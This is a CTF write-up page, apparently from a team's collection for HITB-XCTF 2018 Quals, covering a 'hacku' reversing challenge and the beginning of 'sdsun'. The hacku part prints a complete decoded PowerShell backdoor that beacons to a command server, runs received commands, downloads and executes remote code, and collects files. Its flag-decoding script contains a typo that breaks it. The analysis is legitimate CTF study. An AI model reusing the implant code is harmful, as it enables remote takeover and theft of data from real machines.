<!DOCTYPE HTML>
<!-- This page is modified from the template https://www.codeply.com/go/7XYosZ7VH5 by Carol Skelly (@iatek). -->
<html>
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>HITB-XCTF GSEC CTF 2018 Quals</title>
    <link type="text/css" rel="stylesheet" href="../assets/css/github-markdown.css">
    <link type="text/css" rel="stylesheet" href="../assets/css/pilcrow.css">
    <link type="text/css" rel="stylesheet" href="../assets/css/hljs-github.min.css"/>
    <link type="text/css" rel="stylesheet" href="../assets/css/bootstrap-4.0.0-beta.3.min.css">
    <script type="text/javascript" src="../assets/js/jquery-3.3.1.slim.min.js"></script>
    <script type="text/javascript" src="../assets/js/bootstrap-4.0.0-beta.3.min.js"></script>
    <script type="text/javascript" src="../assets/js/popper-1.14.3.min.js"></script>
    <script type="text/javascript" src="../assets/js/mathjax-2.7.4/MathJax.js?config=TeX-MML-AM_CHTML"></script>
  </head>
  <style>
  body {
      padding-top: 56px;
  }

  .sticky-offset {
      top: 56px;
  }

  #body-row {
      margin-left:0;
      margin-right:0;
  }
  #sidebar-container {
      min-height: 100vh;   
      background-color: #333;
      padding: 0;
  }

  /* Sidebar sizes when expanded and expanded */
  .sidebar-expanded {
      width: 230px;
  }
  .sidebar-collapsed {
      width: 60px;
  }

  /* Menu item*/
  #sidebar-container .list-group a {
      height: 50px;
      color: white;
  }

  /* Submenu item*/
  #sidebar-container .list-group .sidebar-submenu a {
      height: 45px;
      padding-left: 60px;
  }
  .sidebar-submenu {
      font-size: 0.9rem;
  }

  /* Separators */
  .sidebar-separator-title {
      background-color: #333;
      height: 35px;
  }
  .sidebar-separator {
      background-color: #333;
      height: 25px;
  }
  .logo-separator {
      background-color: #333;    
      height: 60px;
  }


  /* 
   active scrollspy
  */
  .list-group-item.active {
    border-color: transparent;
    border-left: #e69138 solid 4px;
  }

  /* 
   anchor padding top
   https://stackoverflow.com/a/28824157
  */
  :target:before {
    content:"";
    display:block;
    height:56px; /* fixed header height*/
    margin:-56px 0 0; /* negative fixed header height */
  }
  </style>
  
  <script>
  // https://stackoverflow.com/a/48330533
  $(window).on('activate.bs.scrollspy', function (event) {
    let active_collapse = $($('.list-group-item.active').parents()[0]);
    $(".collapse").removeClass("show");
    active_collapse.addClass("show");

    let parent_menu = $('a[href="#' + active_collapse[0].id + '"]');
    $('a[href^="#submenu"]').css("border-left", "");
    parent_menu.css("border-left","#e69138 solid 4px");
  });

  // http://docs.mathjax.org/en/latest/tex.html#tex-and-latex-math-delimiters
  MathJax.Hub.Config({
    tex2jax: {
      inlineMath: [['$','$'], ['\\(','\\)']],
      processEscapes: true
    }
  });
  </script>

  <body style="position: relative;" data-spy="scroll" data-target=".sidebar-submenu" data-offset="70">
    <nav class="navbar navbar-expand-md navbar-light bg-light fixed-top">
      <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarNavDropdown" aria-controls="navbarNavDropdown" aria-expanded="false" aria-label="Toggle navigation">
        <span class="navbar-toggler-icon"></span>
      </button>
      <a class="navbar-brand" href="https://github.com/balsn/ctf_writeup">
        <img src="https://github.githubassets.com/images/modules/logos_page/GitHub-Mark.png" class="d-inline-block align-top" alt="" width="30" height="30">
        <span class="menu-collapsed">balsn / ctf_writeup</span>
      </a>
      <div class="collapse navbar-collapse" id="navbarNavDropdown">
        <ul class="navbar-nav my-2 my-lg-0">
            
            <li class="nav-item dropdown d-sm-block d-md-none">
              <iframe src="https://ghbtns.com/github-btn.html?user=balsn&repo=ctf_writeup&type=watch&count=true&size=large&v=2" frameborder="0" scrolling="0" width="140px" height="30px"></iframe>
              <iframe src="https://ghbtns.com/github-btn.html?user=balsn&repo=ctf_writeup&type=star&count=true&size=large" frameborder="0" scrolling="0" width="140px" height="30px"></iframe>
        
              <a class="nav-link dropdown-toggle" href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                rev
              </a>
              <div class="dropdown-menu" aria-labelledby="smallerscreenmenu">
                                <a class="dropdown-item" href="#hacku-(sces60107)">hacku-(sces60107)</a>
    
                <a class="dropdown-item" href="#sdsun-(sces60107-sasdf)">sdsun-(sces60107-sasdf)</a>
    
                <a class="dropdown-item" href="#hex-(sasdf)">hex-(sasdf)</a>
    
              </div>
            </li>
    
            <li class="nav-item dropdown d-sm-block d-md-none">
              <a class="nav-link dropdown-toggle" href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                misc
              </a>
              <div class="dropdown-menu" aria-labelledby="smallerscreenmenu">
                                <a class="dropdown-item" href="#tpyx-(sces60107)">tpyx-(sces60107)</a>
    
                <a class="dropdown-item" href="#readfile-(sces60107)">readfile-(sces60107)</a>
    
                <a class="dropdown-item" href="#pix-(sces60107)">pix-(sces60107)</a>
    
              </div>
            </li>
    
            <li class="nav-item dropdown d-sm-block d-md-none">
              <a class="nav-link dropdown-toggle" href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                pwn
              </a>
              <div class="dropdown-menu" aria-labelledby="smallerscreenmenu">
                                <a class="dropdown-item" href="#once-(kevin47)">once-(kevin47)</a>
    
                <a class="dropdown-item" href="#gundam-(kevin47)">gundam-(kevin47)</a>
    
                <a class="dropdown-item" href="#d-(kevin47)">d-(kevin47)</a>
    
              </div>
            </li>
    
            <li class="nav-item dropdown d-sm-block d-md-none">
              <a class="nav-link dropdown-toggle" href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                web
              </a>
              <div class="dropdown-menu" aria-labelledby="smallerscreenmenu">
                                <a class="dropdown-item" href="#upload-(bookgin)">upload-(bookgin)</a>
    
                <a class="dropdown-item" href="#python's-revenge-(sasdf)">python's-revenge-(sasdf)</a>
    
                <a class="dropdown-item" href="#php-lover-(bookgin-&-sces60107)">php-lover-(bookgin-&-sces60107)</a>
    
                <a class="dropdown-item" href="#baby-baby-(bookgin)">baby-baby-(bookgin)</a>
    
                <a class="dropdown-item" href="#baby-nya-(bookgin)">baby-nya-(bookgin)</a>
    
                <a class="dropdown-item" href="#easy\_pub-(sasdf)">easy\_pub-(sasdf)</a>
    
                <a class="dropdown-item" href="#streamgamex-(sasdf)">streamgamex-(sasdf)</a>
    
                <a class="dropdown-item" href="#base-(how2hack)">base-(how2hack)</a>
    
              </div>
            </li>
    
            <li class="nav-item dropdown d-sm-block d-md-none">
              <a class="nav-link dropdown-toggle" href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                mobile
              </a>
              <div class="dropdown-menu" aria-labelledby="smallerscreenmenu">
                                <a class="dropdown-item" href="#kivy-simple-(sces60107)">kivy-simple-(sces60107)</a>
    
                <a class="dropdown-item" href="#multicheck-(sasdf)">multicheck-(sasdf)</a>
    
              </div>
            </li>
    
        </ul>
      </div>
      <div class="navbar-collapse collapse w-100 order-3 dual-collapse2">
        <ul class="navbar-nav ml-auto">
          <iframe src="https://ghbtns.com/github-btn.html?user=balsn&repo=ctf_writeup&type=watch&count=true&size=large&v=2" frameborder="0" scrolling="0" width="160px" height="30px"></iframe>
          <iframe src="https://ghbtns.com/github-btn.html?user=balsn&repo=ctf_writeup&type=star&count=true&size=large" frameborder="0" scrolling="0" width="160px" height="30px"></iframe>
        </ul>
      </div>
    </nav>
    <div class="row" id="body-row">
      <div id="sidebar-container" class="sidebar-expanded d-none d-md-block col-2">
        <ul class="list-group sticky-top sticky-offset">
          
          <a href="#submenu0" data-toggle="collapse" aria-expanded="false" class="list-group-item list-group-item-action flex-column align-items-start bg-dark">
            <div class="d-flex w-100 justify-content-start align-items-center font-weight-bold">
              <span class="fa fa-dashboard fa-fw mr-3"></span>
              <span class="menu-collapsed">rev</span>
              <span class="submenu-icon ml-auto"></span>
            </div>
          </a>
          <div id="submenu0" class="collapse sidebar-submenu">
            <a href="#hacku-(sces60107)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">hacku-(sces60107)</span>
            </a>
    
<a href="#sdsun-(sces60107-sasdf)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">sdsun-(sces60107-sasdf)</span>
            </a>
    
<a href="#hex-(sasdf)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">hex-(sasdf)</span>
            </a>
    
          </div>
    
          <a href="#submenu1" data-toggle="collapse" aria-expanded="false" class="list-group-item list-group-item-action flex-column align-items-start bg-dark">
            <div class="d-flex w-100 justify-content-start align-items-center font-weight-bold">
              <span class="fa fa-dashboard fa-fw mr-3"></span>
              <span class="menu-collapsed">misc</span>
              <span class="submenu-icon ml-auto"></span>
            </div>
          </a>
          <div id="submenu1" class="collapse sidebar-submenu">
            <a href="#tpyx-(sces60107)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">tpyx-(sces60107)</span>
            </a>
    
<a href="#readfile-(sces60107)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">readfile-(sces60107)</span>
            </a>
    
<a href="#pix-(sces60107)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">pix-(sces60107)</span>
            </a>
    
          </div>
    
          <a href="#submenu2" data-toggle="collapse" aria-expanded="false" class="list-group-item list-group-item-action flex-column align-items-start bg-dark">
            <div class="d-flex w-100 justify-content-start align-items-center font-weight-bold">
              <span class="fa fa-dashboard fa-fw mr-3"></span>
              <span class="menu-collapsed">pwn</span>
              <span class="submenu-icon ml-auto"></span>
            </div>
          </a>
          <div id="submenu2" class="collapse sidebar-submenu">
            <a href="#once-(kevin47)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">once-(kevin47)</span>
            </a>
    
<a href="#gundam-(kevin47)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">gundam-(kevin47)</span>
            </a>
    
<a href="#d-(kevin47)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">d-(kevin47)</span>
            </a>
    
          </div>
    
          <a href="#submenu3" data-toggle="collapse" aria-expanded="false" class="list-group-item list-group-item-action flex-column align-items-start bg-dark">
            <div class="d-flex w-100 justify-content-start align-items-center font-weight-bold">
              <span class="fa fa-dashboard fa-fw mr-3"></span>
              <span class="menu-collapsed">web</span>
              <span class="submenu-icon ml-auto"></span>
            </div>
          </a>
          <div id="submenu3" class="collapse sidebar-submenu">
            <a href="#upload-(bookgin)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">upload-(bookgin)</span>
            </a>
    
<a href="#python's-revenge-(sasdf)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">python's-revenge-(sasdf)</span>
            </a>
    
<a href="#php-lover-(bookgin-&-sces60107)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">php-lover-(bookgin-&-sces60107)</span>
            </a>
    
<a href="#baby-baby-(bookgin)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">baby-baby-(bookgin)</span>
            </a>
    
<a href="#baby-nya-(bookgin)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">baby-nya-(bookgin)</span>
            </a>
    
<a href="#easy\_pub-(sasdf)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">easy\_pub-(sasdf)</span>
            </a>
    
<a href="#streamgamex-(sasdf)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">streamgamex-(sasdf)</span>
            </a>
    
<a href="#base-(how2hack)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">base-(how2hack)</span>
            </a>
    
          </div>
    
          <a href="#submenu4" data-toggle="collapse" aria-expanded="false" class="list-group-item list-group-item-action flex-column align-items-start bg-dark">
            <div class="d-flex w-100 justify-content-start align-items-center font-weight-bold">
              <span class="fa fa-dashboard fa-fw mr-3"></span>
              <span class="menu-collapsed">mobile</span>
              <span class="submenu-icon ml-auto"></span>
            </div>
          </a>
          <div id="submenu4" class="collapse sidebar-submenu">
            <a href="#kivy-simple-(sces60107)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">kivy-simple-(sces60107)</span>
            </a>
    
<a href="#multicheck-(sasdf)" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">multicheck-(sasdf)</span>
            </a>
    
          </div>
    
        </ul>
      </div>
      <div class="col-10 py-3">
        <article class="markdown-body"><h1 id="hitb-xctf-gsec-ctf-2018-quals"><a class="header-link" href="#hitb-xctf-gsec-ctf-2018-quals"></a>HITB-XCTF GSEC CTF 2018 Quals</h1>

<h2 id="rev"><a class="header-link" href="#rev"></a>rev</h2>
<h3 id="hacku-(sces60107)"><a class="header-link" href="#hacku-(sces60107)"></a>hacku (sces60107)</h3>
<p>In this challenge give us two file. A pcap file and a chm file.</p>
<p>The chm file is useless. The pcap file has a large size, because it is downloading windows update file.</p>
<p>After some digging, I found the dns query is interesting. we can extract some base64 string. And I found a script after base64 decoding.</p>
<pre class="hljs"><code>$GET_FILE = <span class="hljs-string">'get-fle'</span> 
$DOWN_EXEC = <span class="hljs-string">'dow-exe'</span>
$RUN_CMD = <span class="hljs-string">'run-cmd'</span>

$GET_REG = <span class="hljs-string">'get-reg'</span>
$GET_TASK = <span class="hljs-string">'get-tak'</span>
$GET_UPDATE = <span class="hljs-string">'get-upd'</span>
$GET_REP = <span class="hljs-string">'get-rep'</span>

$STATUS_INIT  = <span class="hljs-number">0x0000</span>
$STATUS_REGED = <span class="hljs-number">0x8000</span>
$STATUS_TASK  = $STATUS_REGED -bor <span class="hljs-number">0x1</span>
$STATUS_PADD  = $STATUS_REGED -bor <span class="hljs-number">0x2</span>


$url = <span class="hljs-string">'http://192.168.99.234/cc/cc.php'</span>
$status = $STATUS_INIT
$task = $null
$running = $True

$pubk = (<span class="hljs-number">1501</span>,<span class="hljs-number">377753</span>)

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">get</span>-<span class="hljs-title">Md5Hash</span><span class="hljs-params">($str)</span>
</span>{
    $md5 = <span class="hljs-keyword">new</span>-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
    $utf8 = <span class="hljs-keyword">new</span>-object -TypeName System.Text.UTF8Encoding
    $hash = [System.BitConverter]::ToString($md5.ComputeHash($utf8.GetBytes($str)))
    <span class="hljs-keyword">return</span> $hash -replace <span class="hljs-string">'-'</span>
}

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">get</span>-<span class="hljs-title">ComputeName</span>
</span>{
    <span class="hljs-keyword">try</span>
    {
        <span class="hljs-keyword">return</span> (Get-WmiObject Win32_ComputerSystem).Name;
    } <span class="hljs-keyword">catch</span> 
    {
        <span class="hljs-keyword">return</span> <span class="hljs-string">"ErrComputeName"</span>;
    }
}

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">get</span>-<span class="hljs-title">clientID</span>
</span>{
    <span class="hljs-keyword">try</span>
    {
        $did = (wmic diskdrive get SerialNumber)
        $cid = get-Md5Hash $did
        <span class="hljs-keyword">return</span> $cid
    }
    <span class="hljs-keyword">catch</span>
    {
        $CompName = get-ComputeName
        <span class="hljs-keyword">return</span> get-Md5Hash $CompName
    }
}
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Reg</span>-<span class="hljs-title">Info</span>
</span>{
    $clientID = get-clientID
    $time = Get-Date
    $c = $GET_REG
    <span class="hljs-keyword">return</span> @{c = $c ; x = $clientID ;e = $time ; i = <span class="hljs-number">0</span>} |  ConvertTo-Json
}
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">get</span>-<span class="hljs-title">Task</span>
</span>{
    $clientID = get-clientID
    $time = Get-Date
    $c = $GET_TASK
    <span class="hljs-keyword">return</span> @{c = $c ; x = $clientID ;e = $time  ; i = <span class="hljs-number">0</span>} |  ConvertTo-Json
}
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">EttRRRRRRhd</span> <span class="hljs-params">( $tid , $taskinfo )</span>
</span>{
    $clientID = get-clientID
    $time = Get-Date
    $c = $GET_REP
    <span class="hljs-keyword">return</span> @{c = $c ; x = $clientID ;e = $taskinfo; i = $tid} |  ConvertTo-Json
}

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">check_VM</span><span class="hljs-params">()</span>
</span>{
    $p = @(<span class="hljs-string">"win32_remote"</span>,<span class="hljs-string">"win64_remote64"</span>,<span class="hljs-string">"ollydbg"</span>,<span class="hljs-string">"ProcessHacker"</span>,<span class="hljs-string">"tcpview"</span>,<span class="hljs-string">"autoruns"</span>,<span class="hljs-string">"autorunsc"</span>,<span class="hljs-string">"filemon"</span>,<span class="hljs-string">"procmon"</span>,<span class="hljs-string">"regmon"</span>,<span class="hljs-string">"procexp"</span>,<span class="hljs-string">"idaq"</span>,<span class="hljs-string">"idaq64"</span>,<span class="hljs-string">"ImmunityDebugger"</span>,<span class="hljs-string">"Wireshark"</span>,<span class="hljs-string">"dumpcap"</span>,<span class="hljs-string">"HookExplorer"</span>,<span class="hljs-string">"ImportREC"</span>,<span class="hljs-string">"PETools"</span>,<span class="hljs-string">"LordPE"</span>,<span class="hljs-string">"dumpcap"</span>,<span class="hljs-string">"SysInspector"</span>,<span class="hljs-string">"proc_analyzer"</span>,<span class="hljs-string">"sysAnalyzer"</span>,<span class="hljs-string">"sniff_hit"</span>,<span class="hljs-string">"windbg"</span>,<span class="hljs-string">"joeboxcontrol"</span>,<span class="hljs-string">"joeboxserver"</span>)
    <span class="hljs-keyword">for</span> ($i=<span class="hljs-number">0</span>; $i -lt $p.length; $i++) {
        <span class="hljs-keyword">if</span>(ps -name $p[$i] -ErrorAction SilentlyContinue){
            shutdown /s /f /t <span class="hljs-number">0</span>
            <span class="hljs-keyword">exit</span>
        }
    }
}

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">YTRKLJHBKJHJHGV</span><span class="hljs-params">($msg)</span>
</span>{
    <span class="hljs-keyword">while</span>($True)
    {
        <span class="hljs-keyword">try</span>
        {
            $content = $msg
            $webRq = [System.Net.WebRequest]::Create($url)
            $webRq.proxy = [Net.WebRequest]::GetSystemWebProxy()
            $webRq.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials


            <span class="hljs-comment">#</span>

            $content = YNHGFOI8YIUGH $content


            <span class="hljs-comment">#</span>
            $content = OPKE3989hYYY $pubk $content
            <span class="hljs-comment">#</span>

            <span class="hljs-comment">#</span>
            $content = YNHGFOI8YIUGH $content

            $enc = [System.Text.Encoding]::UTF8.GetBytes($content)

            <span class="hljs-comment">#</span>

            $webRq.Method = <span class="hljs-string">'POST'</span>
            $webRq.ContentLength = $enc.length


            <span class="hljs-keyword">if</span> ($enc.length -gt <span class="hljs-number">0</span>)
            {
                $req_stream = $webRq.GetRequestStream()
                $req_stream.Write($enc , <span class="hljs-number">0</span> , $enc.length)

            }

            [System.Net.WebResponse] $rep = $webRq.GetResponse()
            <span class="hljs-keyword">if</span> ($rep -ne $null)
            {
                $data = $rep.GetResponseStream()
                [System.IO.StreamReader] $res_d = <span class="hljs-keyword">New</span>-Object System.IO.StreamReader $data
                [String] $result = $res_d.ReadToEnd()
             }
        }
        <span class="hljs-keyword">catch</span>
        {
            $result = <span class="hljs-string">'err'</span>
            <span class="hljs-comment">#</span>
        }

        <span class="hljs-keyword">if</span> ($result -eq <span class="hljs-string">'err'</span>)
        {

        }
        <span class="hljs-keyword">else</span>
        {

            <span class="hljs-keyword">return</span> $result
        }
    }
}

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">POIUIGKJNBYFF</span><span class="hljs-params">($msg)</span>
</span>{

    $msg = OKMNHGGGGSSAAA $pubk $msg
    $msg = ConvertFrom-Json -InputObject $msg
    <span class="hljs-keyword">return</span> $msg.r,$msg.e
}

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">YNHGFOI8YIUGH</span><span class="hljs-params">( $str )</span>
</span>{
    <span class="hljs-keyword">return</span> [Convert]::ToBase64String( [System.Text.Encoding]::Utf8.GetBytes($str))
}

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">VCDHJIIDDSQQQ</span><span class="hljs-params">( $b64 )</span>
</span>{
    <span class="hljs-keyword">return</span> [System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String($b64))
}

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">POPOUIUJKKKI</span><span class="hljs-params">($file)</span>
</span>{
    <span class="hljs-keyword">return</span> YNHGFOI8YIUGH (Get-Content $file)
}

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">MJOOLLFGFASA</span><span class="hljs-params">($name)</span>
</span>{
    $filelist = @()
    $result = @{}

    <span class="hljs-keyword">for</span> ($i = <span class="hljs-number">0x43</span> ; $i -lt <span class="hljs-number">0x5b</span>; ++ $i)
    {
        <span class="hljs-keyword">try</span>
        {   $dc = <span class="hljs-string">'{0}:/'</span> -f ([char]$i)
            $file = Get-ChildItem <span class="hljs-string">"$dc"</span> -recurse $name | %{$_.FullName}
            <span class="hljs-keyword">if</span> ($file.length -gt <span class="hljs-number">0</span>)
            {
                $filelist += $file
            }
        }
        <span class="hljs-keyword">catch</span>
        {
            <span class="hljs-keyword">continue</span>
        }
    }

    $result.ct = $filelist.length
    $result.dt = @()
    <span class="hljs-keyword">foreach</span>( $f in $filelist)
    {
        $fd = POPOUIUJKKKI $f
        $result.dt += @{path=(YNHGFOI8YIUGH $f ); txt=$fd}
    }
    <span class="hljs-keyword">return</span> ConvertTo-Json -InputObject $result 
}


<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">DXCFGIOUUGKJB764</span><span class="hljs-params">($x, $h, $n)</span>
</span>{
   $y = <span class="hljs-number">1</span>
   <span class="hljs-keyword">while</span>( $h -gt <span class="hljs-number">0</span> )
   {
        <span class="hljs-keyword">if</span> ( ( $h % <span class="hljs-number">2</span> ) -eq <span class="hljs-number">0</span>)
        {
            $x = ($x * $x) % $n
            $h = $h / <span class="hljs-number">2</span>
        }<span class="hljs-keyword">else</span>
        {
            $y = ($x * $y) % $n
            $h = $h - <span class="hljs-number">1</span>
        }
   }
   <span class="hljs-keyword">return</span> $y
}

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">OPKE3989hYYY</span><span class="hljs-params">($pk , $plaintext)</span>
</span>{
    $key , $n = $pk
    $arr = @()
    <span class="hljs-keyword">for</span> ($i = <span class="hljs-number">0</span> ; $i -lt $plaintext.length ; $i++)
    {
     $x = DXCFGIOUUGKJB764 ([int] $plaintext[$i]) $key $n
     $arr += $x
    }
    <span class="hljs-keyword">return</span> $arr
}
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">OKMNHGGGGSSAAA</span><span class="hljs-params">($pk,$enctext)</span>
</span>{
    $key , $n = $pk
    $txt = <span class="hljs-string">""</span>

    $enctext = VCDHJIIDDSQQQ $enctext
    [int[]]$enctab =  $enctext -split <span class="hljs-string">' '</span>
    <span class="hljs-keyword">foreach</span> ($x in $enctab)
    {
        <span class="hljs-keyword">if</span> ($x -eq <span class="hljs-number">0</span>)
        {
            <span class="hljs-keyword">continue</span>
        }
        $x = DXCFGIOUUGKJB764 $x $key $n
        $txt += [char][int]$x
    }
    $txt = VCDHJIIDDSQQQ($txt)
    <span class="hljs-keyword">return</span> $txt
}

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">UIHIUHGUYGOIJOIHGIHGIH</span><span class="hljs-params">($cmd)</span>
</span>{
    $cmd = ConvertFrom-Json -InputObject $cmd
    $c = $cmd.c
    $i = $cmd.i
    $e = $cmd.e
    $x = $cmd.x 

    <span class="hljs-comment">#</span>
    <span class="hljs-comment">#</span>

    <span class="hljs-keyword">if</span> ($c -eq $GET_FILE)
    {

        $d = MJOOLLFGFASA $e
    }
    <span class="hljs-keyword">elseif</span> ($c -eq $RUN_CMD)
    {

        $d = Invoke-Expression $e -ErrorAction SilentlyContinue
    }
    <span class="hljs-keyword">elseif</span> ($c -eq $DOWN_EXEC)
    {

        $d = Invoke-Expression ((<span class="hljs-keyword">New</span>-Object Net.WebClient).DownloadString(<span class="hljs-string">"$e"</span>)) -ErrorAction SilentlyContinue
    }
<span class="hljs-keyword">return</span> @($i , $d)
}


$MuName = <span class="hljs-string">'Global\_94_HACK_U_HAHAHAHAHA'</span>
$retFlag = $flase
$Result = $True 
$MyMutexObj = <span class="hljs-keyword">New</span>-Object System.Threading.Mutex ($true,$MuName,[ref]$retFlag)
<span class="hljs-keyword">if</span> ($retFlag)
{
    $Result = $True
}
<span class="hljs-keyword">else</span>
{
    $Result = $False
}

<span class="hljs-keyword">if</span> ($Result)
{
    <span class="hljs-keyword">while</span>($True -<span class="hljs-keyword">and</span> $running)
    {

        <span class="hljs-keyword">if</span>($status -eq $STATUS_INIT)
        {

            $OO0O0O0O00 = Reg-Info


            $ret = YTRKLJHBKJHJHGV($OO0O0O0O00)

            $r,$e = POIUIGKJNBYFF($ret)


            <span class="hljs-keyword">if</span> ($r -eq <span class="hljs-string">'yes'</span> -<span class="hljs-keyword">and</span> $e -eq <span class="hljs-string">'ok_then_u_go'</span>)
            {
                $status = $STATUS_PADD


            }
        }
        <span class="hljs-keyword">if</span> ($status -eq $STATUS_PADD)
        {


            $OO0O0O0O00 = get-Task

            $ret = YTRKLJHBKJHJHGV($OO0O0O0O00)
            $r,$e = POIUIGKJNBYFF($ret)
            <span class="hljs-keyword">if</span> ($r -eq <span class="hljs-string">'yes'</span>)
            {

                $task = $e
                $status = $STATUS_TASK
            }

        }
        <span class="hljs-keyword">if</span> ($status -eq $STATUS_TASK)
        {


            <span class="hljs-comment">#</span>
            $ret = UIHIUHGUYGOIJOIHGIHGIH($task)
            $OO0O0O0O00 = EttRRRRRRhd $ret[<span class="hljs-number">0</span>] $ret[<span class="hljs-number">1</span>]
            $ret = YTRKLJHBKJHJHGV($OO0O0O0O00)

            $r,$e = POIUIGKJNBYFF($ret)
            <span class="hljs-keyword">if</span> ($r -eq <span class="hljs-string">'yes'</span>)
            {
                $status = $STATUS_PADD
                $task = $null
            }
        }

        sleep <span class="hljs-number">3</span>
    }
    $MyMutexObj.ReleaseMutex() | Out-<span class="hljs-keyword">Null</span>
    $MyMutexObj.Dispose() | Out-<span class="hljs-keyword">Null</span>
}
<span class="hljs-keyword">else</span>
{

}</code></pre><p>They use <code>rsa</code> to encrypt message. the n is easy to factor.</p>
<p>Still, we can find out the encrypted message from pcap file.</p>
<p>We also extract two things from those message. The first one is a rar file, the second is a ps1 script.</p>
<p>We cannot open the rar file. After a few hour, the host change the challenge. Now we have flag part1 instead of rar file. The flag part1 is <code>HITBXCTF{W0rk_1n_th3_dark_</code></p>
<p>Let&#39;s see the ps1 script. It actually generate a exe file at the temp directory.</p>
<p>Then, we can reverse that exe file.</p>
<p>I found out that it&#39;s trying to write something on MBR. </p>
<p>The final step is reversing what it write on MBR. It&#39;s 80286 architecture.</p>
<p>Now we just need decode the encryted flag part2.</p>
<pre class="hljs"><code>ciphertext='%\xa<span class="hljs-number">19</span>\<span class="hljs-keyword">x</span><span class="hljs-number">89</span>\xa<span class="hljs-number">6</span>\<span class="hljs-keyword">x</span><span class="hljs-number">9</span>d\xd<span class="hljs-number">5</span>\xa<span class="hljs-number">5</span>u\<span class="hljs-keyword">x</span><span class="hljs-number">8</span>dJ\<span class="hljs-keyword">x</span><span class="hljs-number">92</span>\xf<span class="hljs-number">1</span>Y^\<span class="hljs-keyword">x</span><span class="hljs-number">91</span>'
def ror(a,b):
  return (a&gt;&gt;b)|(a&lt;&lt;(<span class="hljs-number">8</span>-b))
def rol(a,b):
  return (a&lt;&lt;b)|(a&gt;&gt;(<span class="hljs-number">8</span>-b))
flag=<span class="hljs-string">""</span>
table=[]
#maintain a table
for j in range(<span class="hljs-number">256</span>):
  <span class="hljs-keyword">x</span>=j
  <span class="hljs-keyword">x</span>=ror(<span class="hljs-keyword">x</span>,<span class="hljs-number">3</span>)<span class="hljs-symbol">%256</span>
  <span class="hljs-keyword">x</span>^=<span class="hljs-number">0x74</span>
  <span class="hljs-keyword">x</span>=rol(<span class="hljs-keyword">x</span>,<span class="hljs-number">5</span>)<span class="hljs-symbol">%256</span>
  <span class="hljs-keyword">x</span>+=<span class="hljs-number">0x47</span>
  <span class="hljs-keyword">x</span>%=<span class="hljs-number">256</span>
  if(<span class="hljs-keyword">x</span><span class="hljs-symbol">%2</span>==<span class="hljs-number">0</span>):
    teble.append(<span class="hljs-keyword">x</span><span class="hljs-number">-1</span>)
  else:
    table.append(<span class="hljs-keyword">x</span>+<span class="hljs-number">1</span>)
for i in ciphertext:
  flag+=chr(table.index(<span class="hljs-keyword">ord</span>(i)))
print flag</code></pre><h3 id="sdsun-(sces60107-sasdf)"><a class="header-link" href="#sdsun-(sces60107-sasdf)"></a>sdsun (sces60107 sasdf)</h3>
<p>The first thing you will notice is that the binary is packed by upx.</p>
<p>The way I unpack the binary is using gdb. I let the binary exectue for a while. It will be unpacked in the memory. So I can dump the whole memory in gdb.</p>
<p>Now I have the unpacked binary. but it is hard to understand it.</p>
<p>I found some feature indicating that this binary is written in Go language.</p>
<p>Then I use this <a href="https://gitlab.com/zaytsevgu/goutils/blob/master/go_renamer.py">script</a> to recover the symbol. It will be much easier to understand this binary.
<img src="https://i.imgur.com/ysBuyUy.png" alt=""></p>
<p>It seems like there is a backdoor. This binary will listen to a random port. And it will output the port number.</p>
<p>The communication with the backdoor is compressed. and it use zlib. Also, the communication format is json.</p>
<p>The backdoor will give you flag if your command is <code>{&quot;action&quot;:&quot;GetFlag&quot;}</code>. We found this rule in <code>main.Process</code>
